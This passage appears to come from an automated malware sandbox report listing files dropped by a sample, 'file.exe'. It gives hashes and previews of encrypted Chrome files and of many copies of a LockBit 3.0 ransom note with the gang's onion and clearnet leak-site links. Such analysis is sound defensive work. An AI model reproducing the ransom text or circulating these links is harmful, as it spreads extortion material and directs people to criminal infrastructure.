                SHA-512:636177508E2CDD8C5499E6F9C9745CFC573BC568A94DFC46C88264D80B0141A759C41A1A9913F159B11902DC1EB79FE2EDE37832A91582955BD6254EE0455211
                Malicious:false
                Preview:.kb..o...!....^>.c-u..6{7.!.......z..i....Q.<..3....C..2..U.3..V....P......$Y.....}...%yG...Z.G.2.SD&q....x@wo...Q.l..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):257
                Entropy (8bit):7.186392667943601
                Encrypted:false
                SSDEEP:6:OgHxlPSmfEscTXfOQjA/tmW2VJzBAWnktNsZVgDCFtlF1BVr/Ukn:PRlKiEsczfhjAVD2VJNAWnM+i+9BVzd
                MD5:EA9FCAEFFC2E811A82BF93A700314575
                SHA1:A37CC065C99C8A54936132D420D1E3B5EB659906
                SHA-256:5F14B3FC53ABDE8612BC31F4D34C739F225E7C05BAF4DF573588B17B9272EAE0
                SHA-512:86D4E8682684DA2D8246D0548AA51948598595D348EC1E292649487FA9B7E2A667696E97F2BFEBBC56912E97AA8EF6DFE49E839ACEE095726D2A88CF75E4A644
                Malicious:false
                Preview:P<.,.^7.b-n.O6H7.!.........i..#.i#).5.......C.h.=...2<..@O.~OO?.^....T=....>A.....5yi.R..;qht.z}....%aN..k....O0.....Ww..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Google\Chrome\User Data\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Google\Chrome\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Google\CrashReports\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Google\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Microsoft Help\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\MicrosoftEdge\SharedCacheContainers\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\MicrosoftEdge\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
